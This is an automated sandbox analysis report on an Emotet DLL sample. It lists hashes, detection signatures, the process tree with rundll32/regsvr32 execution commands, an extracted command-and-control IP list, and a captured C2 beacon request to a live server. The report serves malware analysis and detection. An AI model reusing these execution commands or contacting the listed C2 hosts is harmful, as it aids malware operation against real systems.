Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5CUFfVMSaQ

Overview

General Information

Sample Name:5CUFfVMSaQ (renamed file extension from none to dll)
Analysis ID:671666
MD5:5d4728494832d03bbfb75367836fef4e
SHA1:abcbd283801a05390995862f59dcb5310f3d3d88
SHA256:caa60b9025dfba07efac6cae5438a8e20d9b7c210a721a4cf1f9d7b6df4d7d90
Tags:exeOpenCTIBRSandboxed
Infos:

Detection

Emotet
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)
IP address seen in connection with other malware
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Connects to several IPs in different countries
Registers a DLL
PE file contains more sections than normal
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 7016 cmdline: loaddll64.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 7024 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 7044 cmdline: rundll32.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 7032 cmdline: regsvr32.exe /s C:\Users\user\Desktop\5CUFfVMSaQ.dll MD5: D78B75FC68247E8A63ACBA846182740E)
      • regsvr32.exe (PID: 7132 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NCybOKcMqaEIN\jnEWIdoCfnPf.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 7052 cmdline: rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,ABeFtrnwmgAedx MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 7108 cmdline: rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,AEjATaIExpQg MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6160 cmdline: rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,AbfBlUFQKbpevAFdaCpElBdscB MD5: 73C519F050C20580F8A62C849D49215A)
  • svchost.exe (PID: 6476 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6448 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4520 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5216 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5092 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
{"C2 list": ["108.194.0.0:443", "40.4.0.0:1", "4.4.0.0:1", "8.4.0.0:1", "24.4.0.0:1", "232.3.0.0:1", "20.4.0.0:1", "236.3.0.0:1", "36.4.0.0:1", "139.247.2.0:2096", "160.153.244.0:1", "21.115.0.0:4", "133.247.2.0:4048", "4.1.0.0:92", "224.146.244.0:1", "120.247.2.0:4048", "121.247.2.0:5104", "160.154.244.0:1", "141.247.2.0:5104", "160.147.244.0:1", "143.247.2.0:4544", "160.156.244.0:1", "145.247.2.0:2912", "224.150.244.0:1", "153.247.2.0:1324"]}
SourceRuleDescriptionAuthorStrings
5CUFfVMSaQ.dllJoeSecurity_Emotet_2Yara detected EmotetJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000004.00000002.449537237.00000237550F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000003.00000002.448904188.0000025326DA1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000002.00000002.452429989.0000000002810000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            00000006.00000002.964376372.0000000000F3B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Emotet_3Joe Security
              Click to see the 6 entries
              SourceRuleDescriptionAuthorStrings
              3.2.rundll32.exe.25325750000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                6.2.regsvr32.exe.1130000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  4.2.rundll32.exe.237550f0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    6.2.regsvr32.exe.1130000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      2.2.regsvr32.exe.2810000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                        Click to see the 5 entries
                        No Sigma rule has matched
                        Timestamp:192.168.2.5188.165.79.151497724432404320 07/22/22-13:16:45.923727
                        SID:2404320
                        Source Port:49772
                        Destination Port:443
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 5CUFfVMSaQ.dllVirustotal: Detection: 21%Perma Link
                        Source: 5CUFfVMSaQ.dllMetadefender: Detection: 45%Perma Link
                        Source: 5CUFfVMSaQ.dllReversingLabs: Detection: 80%
                        Source: 00000006.00000002.964477134.0000000000F7E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["108.194.0.0:443", "40.4.0.0:1", "4.4.0.0:1", "8.4.0.0:1", "24.4.0.0:1", "232.3.0.0:1", "20.4.0.0:1", "236.3.0.0:1", "36.4.0.0:1", "139.247.2.0:2096", "160.153.244.0:1", "21.115.0.0:4", "133.247.2.0:4048", "4.1.0.0:92", "224.146.244.0:1", "120.247.2.0:4048", "121.247.2.0:5104", "160.154.244.0:1", "141.247.2.0:5104", "160.147.244.0:1", "143.247.2.0:4544", "160.156.244.0:1", "145.247.2.0:2912", "224.150.244.0:1", "153.247.2.0:1324"]}
                        Source: unknownHTTPS traffic detected: 188.165.79.151:443 -> 192.168.2.5:49772 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 188.165.79.151:443 -> 192.168.2.5:49772 version: TLS 1.2
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800426C8 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800436B4 FindFirstFileExW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018004383C FindFirstFileExW,FindNextFileW,FindClose,FindClose,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180043DBC FindFirstFileExW,FindNextFileW,FindClose,FindClose,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02930A20 FindFirstFileW,FindNextFileW,

                        Networking

                        barindex
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 188.165.79.151 443
                        Source: TrafficSnort IDS: 2404320 ET CNC Feodo Tracker Reported CnC Server TCP group 11 192.168.2.5:49772 -> 188.165.79.151:443
                        Source: Malware configuration extractorIPs: 108.194.0.0:443
                        Source: Malware configuration extractorIPs: 40.4.0.0:1
                        Source: Malware configuration extractorIPs: 4.4.0.0:1
                        Source: Malware configuration extractorIPs: 8.4.0.0:1
                        Source: Malware configuration extractorIPs: 24.4.0.0:1
                        Source: Malware configuration extractorIPs: 232.3.0.0:1
                        Source: Malware configuration extractorIPs: 20.4.0.0:1
                        Source: Malware configuration extractorIPs: 236.3.0.0:1
                        Source: Malware configuration extractorIPs: 36.4.0.0:1
                        Source: Malware configuration extractorIPs: 139.247.2.0:2096
                        Source: Malware configuration extractorIPs: 160.153.244.0:1
                        Source: Malware configuration extractorIPs: 21.115.0.0:4
                        Source: Malware configuration extractorIPs: 133.247.2.0:4048
                        Source: Malware configuration extractorIPs: 4.1.0.0:92
                        Source: Malware configuration extractorIPs: 224.146.244.0:1
                        Source: Malware configuration extractorIPs: 120.247.2.0:4048
                        Source: Malware configuration extractorIPs: 121.247.2.0:5104
                        Source: Malware configuration extractorIPs: 160.154.244.0:1
                        Source: Malware configuration extractorIPs: 141.247.2.0:5104
                        Source: Malware configuration extractorIPs: 160.147.244.0:1
                        Source: Malware configuration extractorIPs: 143.247.2.0:4544
                        Source: Malware configuration extractorIPs: 160.156.244.0:1
                        Source: Malware configuration extractorIPs: 145.247.2.0:2912
                        Source: Malware configuration extractorIPs: 224.150.244.0:1
                        Source: Malware configuration extractorIPs: 153.247.2.0:1324
                        Source: Joe Sandbox ViewASN Name: TCISLTataCommunicationsIN TCISLTataCommunicationsIN
                        Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                        Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: kJZtvOKXxX=hTloIDqhoyWpurUw3AxwGwlasyWlepnQrzPzxDdUOeOLyYl1IS66LGJ7p3GRml0qSCniQY8iO9vwBvYi0s9GFTLntOUX1Zv/Yct+Xz8D8ChWhoNEM9sP7kk/vQZZ5Ril8i53FqG17zNu5+qxXeF44TrT5h9rSAkz2z7kX0nZnwYiZveRpVLi2JYEMWQdksTrTzltZQZOrQPQdu4BaI2PwYAAsLHNp24r2uk3knZ1f90JTxLZKGsWTLdTxREVM9QYo5C/g/WNCeWU7ydkurXqgqGDaOFhx/8wopk+lxr0GYWs4XyAPwQ23Q==Host: 188.165.79.151Connection: Keep-AliveCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 188.165.79.151 188.165.79.151
                        Source: unknownNetwork traffic detected: IP country count 10
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.165.79.151
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.165.79.151
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.165.79.151
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.165.79.151
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.165.79.151
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.165.79.151
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.165.79.151
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.165.79.151
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.165.79.151
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.165.79.151
                        Source: svchost.exe, 00000014.00000003.624845071.0000024E7156E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-07-22T07:55:01.8237416Z||.||b7e2ac48-308b-4ab0-ad70-c01dd95863e0||1152921505695074449||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                        Source: svchost.exe, 00000014.00000003.624845071.0000024E7156E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-07-22T07:55:01.8237416Z||.||b7e2ac48-308b-4ab0-ad70-c01dd95863e0||1152921505695074449||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                        Source: regsvr32.exe, 00000006.00000003.502653267.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.964551145.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.837320264.000001FFA508B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.668398256.0000024E71500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.624494400.0000024E71506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: svchost.exe, 0000000C.00000002.837320264.000001FFA508B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.668398256.0000024E71500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.624494400.0000024E71506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                        Source: svchost.exe, 00000014.00000003.641209465.0000024E715B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641248614.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641270170.0000024E715A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641297731.0000024E715C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                        Source: regsvr32.exe, 00000006.00000002.964477134.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502763451.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502855478.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.964412082.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502695787.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.964376372.0000000000F3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.165.79.151/
                        Source: regsvr32.exe, 00000006.00000002.964412082.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502695787.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.165.79.151/oA~
                        Source: svchost.exe, 00000014.00000003.641209465.0000024E715B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641248614.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641270170.0000024E715A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641297731.0000024E715C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                        Source: svchost.exe, 00000014.00000003.637666200.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637519972.0000024E71A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637725354.0000024E71A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637589847.0000024E71A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637475233.0000024E715A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637701522.0000024E715B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637485712.0000024E715B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                        Source: svchost.exe, 00000014.00000003.641297731.0000024E715C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                        Source: svchost.exe, 00000014.00000003.641209465.0000024E715B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641248614.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641270170.0000024E715A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641297731.0000024E715C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                        Source: svchost.exe, 00000014.00000003.637666200.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637519972.0000024E71A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637725354.0000024E71A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637589847.0000024E71A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637475233.0000024E715A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637701522.0000024E715B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637485712.0000024E715B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                        Source: svchost.exe, 00000014.00000003.637666200.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637519972.0000024E71A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637725354.0000024E71A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637589847.0000024E71A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637475233.0000024E715A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637701522.0000024E715B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637485712.0000024E715B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                        Source: svchost.exe, 00000014.00000003.647804814.0000024E7158E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.646539654.0000024E71A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.646486184.0000024E71A18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292C324 InternetReadFile,
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: kJZtvOKXxX=hTloIDqhoyWpurUw3AxwGwlasyWlepnQrzPzxDdUOeOLyYl1IS66LGJ7p3GRml0qSCniQY8iO9vwBvYi0s9GFTLntOUX1Zv/Yct+Xz8D8ChWhoNEM9sP7kk/vQZZ5Ril8i53FqG17zNu5+qxXeF44TrT5h9rSAkz2z7kX0nZnwYiZveRpVLi2JYEMWQdksTrTzltZQZOrQPQdu4BaI2PwYAAsLHNp24r2uk3knZ1f90JTxLZKGsWTLdTxREVM9QYo5C/g/WNCeWU7ydkurXqgqGDaOFhx/8wopk+lxr0GYWs4XyAPwQ23Q==Host: 188.165.79.151Connection: Keep-AliveCache-Control: no-cache
                        Source: unknownHTTPS traffic detected: 188.165.79.151:443 -> 192.168.2.5:49772 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 188.165.79.151:443 -> 192.168.2.5:49772 version: TLS 1.2

                        E-Banking Fraud

                        barindex
                        Source: Yara matchFile source: 00000006.00000002.964376372.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 3.2.rundll32.exe.25325750000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.1130000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.237550f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.1130000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.regsvr32.exe.2810000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.25325750000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.regsvr32.exe.2810000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.237550f0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.449537237.00000237550F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.448904188.0000025326DA1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.452429989.0000000002810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.964724556.0000000001130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.449599584.0000023755221000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.448824975.0000025325750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.964860380.0000000002911000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5CUFfVMSaQ.dll, type: SAMPLE
                        Source: Yara matchFile source: 2.2.regsvr32.exe.180000000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.180000000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.965051526.0000000180001000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: C:\Windows\System32\regsvr32.exeFile deleted: C:\Windows\System32\NCybOKcMqaEIN\jnEWIdoCfnPf.dll:Zone.IdentifierJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\NCybOKcMqaEIN\Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C00C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E038
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E224
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C23C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A248
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A390
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800143D4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E424
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C46C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A4D8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180056540
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C574
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180018598
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A5E4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E60C
